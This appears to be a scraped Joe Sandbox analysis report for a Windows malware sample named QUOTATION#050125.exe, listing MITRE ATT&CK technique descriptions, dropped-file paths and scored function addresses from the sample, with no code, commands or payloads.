Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report QUOTATION#050125.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\b427-I_1

C:\Users\user\AppData\Local\Temp\obtenebrate

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Windows Analysis Report
QUOTATION#050125.exe

Function 004842DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Function 004842A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Function 004C2BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Function 00482CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Function 00482B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Function 00483170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Function 0048344D Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 201
registryCOMMON

Function 004C065B Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 272
COMMON

Function 01B29030 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Function 00482C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Function 01B28DC0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 158
fileCOMMON

Function 00483B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58
registryCOMMON

Function 01B27CB0 Relevance: 6.7, APIs: 4, Instructions: 720
processthreadCOMMON

Function 00483923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94
windowCOMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre